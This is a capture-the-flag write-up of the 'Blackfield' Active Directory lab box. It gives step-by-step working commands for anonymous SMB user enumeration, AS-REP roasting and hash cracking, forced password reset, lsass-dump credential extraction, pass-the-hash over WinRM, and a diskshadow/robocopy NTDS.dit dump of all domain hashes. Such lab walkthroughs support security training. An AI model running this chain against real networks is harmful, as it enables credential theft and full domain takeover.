Myles Nieman
← All writeups

Blackfield

Overview

Blackfield is a hard Windows box built around a three-hop Active Directory chain. The profiles$ SMB share leaks a large username list with no credentials needed. AS-REP roasting finds the support account has pre-auth disabled, and rockyou.txt cracks its hash. BloodHound maps a ForceChangePassword right from support to audit2020, which grants access to the forensic share. That share holds a memory dump of lsass.exe; parsing it with pypykatz recovers svc_backup’s NTLM hash. svc_backup has WinRM access and belongs to the Backup Operators group — specifically SeBackupPrivilege — which is used with a diskshadow script to create a VSS snapshot, robocopy NTDS.dit, and dump all domain hashes.

Path: anonymous SMB → username enumeration → AS-REP roast support → ForceChangePassword → audit2020forensic share → lsass.dmp → svc_backup NTLM → SeBackupPrivilege → VSS → NTDS.dit → Administrator hash.

Enumeration

$ nmap 10.10.10.192 -Pn -p- -A

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local)
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0

Host is pingable and responding

Domain: BLACKFIELD.local, hostname DC01. WinRM on 5985 means that any account with Remote Management access will land a shell. The clock skew from the scan output is a reminder to sync time before Kerberos operations.

SMB shares

$ smbclient -L //blackfield.local
    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    forensic        Disk      Forensic / Audit share.
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share
    profiles$       Disk
    SYSVOL          Disk      Logon server share

profiles$ is accessible anonymously. It contains hundreds of empty user directories — a clean username list. Parsing the share output to extract the first column gives users.txt.

$ smbclient //blackfield.local/profiles$ -N -c "ls" | awk '{print $1}' > users.txt

Foothold — AS-REP Roasting

With a large username list, checking for accounts with pre-authentication disabled is a quick win:

$ GetNPUsers.py -usersfile users.txt blackfield.local/ -dc-ip 10.10.10.192 \
    -format hashcat -outputfile hashes.txt

After fixing the clock skew with rdate, the command returns a roastable hash for support. Cracking against rockyou.txt:

$ hashcat -m 18200 -a 0 hashes.txt /tools/SecLists/Passwords/Leaked-Databases/rockyou.txt

AS-REP hash cracked for the support account

The support account’s password is recovered.

Lateral Movement — ForceChangePassword to audit2020

With support credentials, BloodHound can be collected to map AD rights:

$ python3 bloodhound.py -u support -d BLACKFIELD.local -c All --zip -ns 10.10.10.192

Querying shortest paths from owned principals in BloodHound reveals that support has ForceChangePassword on audit2020:

BloodHound graph showing ForceChangePassword from support to audit2020

Changing audit2020’s password from Linux:

$ net rpc password "audit2020" "newP@ssword2022" \
    -U "BLACKFIELD"/"support"%"#00^BlackKnight" -S "BLACKFIELD.local"

Verifying access to the forensic share:

$ smbclient -U "audit2020" //BLACKFIELD.local/forensic

The share contains three directories — commands_output, memory_analysis, and tools. Inside memory_analysis is lsass.zip, which holds lsass.dmp.

User — lsass Dump → svc_backup Hash

Parsing the dump with pypykatz (or mimikatz) to extract cached credentials recovers svc_backup’s NTLM hash:

pypykatz extracts the svc_backup NTLM hash from lsass.dmp

$ evil-winrm -u "svc_backup" -H <svc_backup_hash> -i blackfield.local

Checking privileges:

*Evil-WinRM* PS> whoami /all

The account is a member of Backup Operators and holds SeBackupPrivilege — the right to read any file on the filesystem, bypassing ACLs.

Privilege Escalation — SeBackupPrivilege via Diskshadow

SeBackupPrivilege can be weaponized with diskshadow to create a VSS snapshot of C: and then use robocopy (which respects backup semantics) to copy NTDS.dit and the SYSTEM hive out.

A diskshadow script handles the VSS side:

set verbose ON
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
exit
*Evil-WinRM* PS> upload commands.dsh
*Evil-WinRM* PS> diskshadow /s commands.dsh

Diskshadow script uploaded and running to create the VSS snapshot

VSS snapshot created and exposed as drive E:

Then copy the hive and NTDS from the shadow:

*Evil-WinRM* PS> reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.SAV
*Evil-WinRM* PS> robocopy E:\Windows\NTDS C:\Windows\Temp\ntds ntds.dit /b

Download both files and run secretsdump locally:

$ impacket-secretsdump -ntds ntds.dit -system SYSTEM.SAV LOCAL

secretsdump extracting hashes from NTDS.dit with the SYSTEM hive

Administrator NTLM hash recovered from NTDS

With the Administrator hash, pass-the-hash into the box:

$ evil-winrm -u Administrator -H <admin_hash> -i blackfield.local

Takeaways

  • Large anonymous profile shares are a gold mine for username enumeration — even empty home directories establish a valid user list that feeds AS-REP roasting.
  • SeBackupPrivilege is a full domain compromise primitive. A Backup Operators member can create a VSS snapshot and robocopy NTDS.dit with no additional rights required; the diskshadow scripted approach avoids interactive limitations and works reliably over WinRM.